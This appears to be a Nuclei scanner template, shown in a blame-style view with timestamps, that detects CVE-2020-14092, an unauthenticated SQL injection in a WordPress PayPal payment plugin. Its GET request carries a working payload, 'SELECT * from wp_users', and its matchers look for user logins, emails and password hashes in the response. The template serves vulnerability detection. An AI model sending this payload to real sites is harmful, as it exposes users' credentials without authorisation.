2021-03-10 11:36:11 +00:00
id : CVE-2020-14092
info :
name : WordPress Payment Form For Paypal Pro Unauthenticated SQL Injection
author : princechaddha
severity : critical
2021-03-18 13:11:27 +00:00
description : WordPress Payment Form For Paypal Pro 'query' parameter allows for any unauthenticated user to perform SQL queries with result output to a web page in JSON format.
2021-03-10 11:36:11 +00:00
reference : https://wpscan.com/vulnerability/10287
2021-03-12 12:02:16 +00:00
tags : cve,cve2020,wordpress,wp-plugin,sqli
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.80
cve-id : CVE-2020-14092
cwe-id : CWE-89
2021-03-10 11:36:11 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/?cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_users"
matchers-condition : and
matchers :
- type : word
words :
- "text/html"
part : header
- type : word
words :
- '"user_login"'
- '"user_email"'
- '"user_pass"'
- '"user_activation_key"'
condition : and
part : body
- type : status
status :
- 200